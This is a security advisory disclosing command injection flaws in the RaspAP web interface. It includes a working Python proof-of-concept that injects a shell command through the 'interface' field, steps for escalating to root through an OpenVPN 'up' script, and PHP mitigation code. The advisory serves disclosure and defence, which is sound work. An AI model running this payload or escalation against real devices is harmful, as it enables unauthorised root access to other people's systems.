
Security advisory

Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server. Additional factors in the default configuration allow elevation to root privileges.

Affected products

RaspAP v2.8.9 and older

Steps to reproduce

  1. Obtain credentials for RaspAP
  2. Configure and execute the following script

#!/usr/bin/env python3

import re
import requests

TARGET = "10.3.141.1"
CREDS = "admin:secret"
# Credentials are sent as HTTP basic auth embedded in the URL
URL = f"http://{CREDS}@{TARGET}/hostapd_conf"

sess = requests.Session()

# Get a valid CSRF token from the form
doc = sess.get(URL).text.replace("\n", "")
csrf = re.match('.*name="csrf_token" value="([^"]+)".*', doc).group(1)

print(csrf)

res = sess.post(URL,
                data={
                    "csrf_token": csrf,
                    "txpower": "auto",

                    # Command payload is here:
                    "interface": ";uptime > /tmp/hax; echo",
                })

if res.status_code != 200:
    print("Failed to execute command")

  3. Observe that the file /tmp/hax has been created on the raspi, and contains the output of uptime.

Cause

There are two almost identical instances of the vulnerability, at hostapd.php:103 and hostapd.php:108. In both instances, an unsanitized POST variable is fed into a command executed using exec().

A third instance exists at configure_client.php:20, exploitable in a similar manner.

Impact

An authenticated user is able to execute arbitrary commands as www-data.

In the default RaspAP configuration, this can be leveraged to gain root access by abusing two of the configured sudo permissions: overwrite the OpenVPN client configuration to set the following:

script-security 2
up /tmp/payload.sh

and establish an OpenVPN connection. /tmp/payload.sh will be executed with root privileges.

Proposed Mitigation

Apply sanitization to the txpower and interface parameters, and use the PHP built-in escapeshellarg() before passing them to exec().
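The following is an added illustration of the proposed mitigation, not RaspAP's own code: the unsafe pattern described in the Cause section (a raw POST value concatenated into an exec() command line) is shown beside a hardened version that validates the two parameters named above and then wraps them with escapeshellarg(). The parameter names interface and txpower come from this advisory; the shape of the underlying command (an iw invocation), the helper names and the sample inputs are assumptions.

```php
<?php
// Added example, not RaspAP code. The command shape and helper names are
// assumptions; only the parameter names come from the advisory.
declare(strict_types=1);

// Vulnerable pattern: the POST value is concatenated straight into the
// command string, so ";uptime > /tmp/hax; echo" becomes a second command
// when the string reaches exec().
function buildCommandUnsafe(array $post): string
{
    return 'iw dev ' . $post['interface'] . ' set txpower ' . $post['txpower'];
}

// Interface names on Linux are at most 15 bytes; accept only a conservative
// character set so shell metacharacters never get this far.
function validateInterface(string $iface): string
{
    if (!preg_match('/^[A-Za-z0-9._-]{1,15}$/', $iface)) {
        throw new InvalidArgumentException('invalid interface name');
    }
    return $iface;
}

// txpower is either the literal "auto" or a small non-negative integer.
// ctype_digit() rejects signs, whitespace and anything non-numeric.
function validateTxpower(string $txpower): string
{
    if ($txpower === 'auto') {
        return 'auto';
    }
    if (!ctype_digit($txpower) || (int) $txpower > 30) {
        throw new InvalidArgumentException('invalid txpower');
    }
    return $txpower;
}

// Hardened pattern: validate first, then escape. escapeshellarg() alone
// would keep the shell from splitting the argument, but the allow-list is
// what guarantees the value is a plausible interface name at all.
function buildCommandSafe(array $post): string
{
    $iface = escapeshellarg(validateInterface((string) ($post['interface'] ?? '')));
    $power = escapeshellarg(validateTxpower((string) ($post['txpower'] ?? '')));
    return "iw dev $iface set txpower $power";
}

// Constructed sample inputs: one benign request and the payload from the PoC.
$benign  = ['interface' => 'wlan0', 'txpower' => 'auto'];
$payload = ['interface' => ';uptime > /tmp/hax; echo', 'txpower' => 'auto'];

echo buildCommandUnsafe($payload), PHP_EOL; // injected command reaches the shell
echo buildCommandSafe($benign), PHP_EOL;    // iw dev 'wlan0' set txpower 'auto'

try {
    buildCommandSafe($payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Validation is kept in front of escaping deliberately: escapeshellarg() prevents the argument from being split into further commands, but it does not stop a value such as a leading "-" from being interpreted as an option by the invoked program, and it does not establish that the value names a real interface. Where the list of interfaces is known to the application, comparing the submitted value against that list is stricter still than the pattern check used here.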

History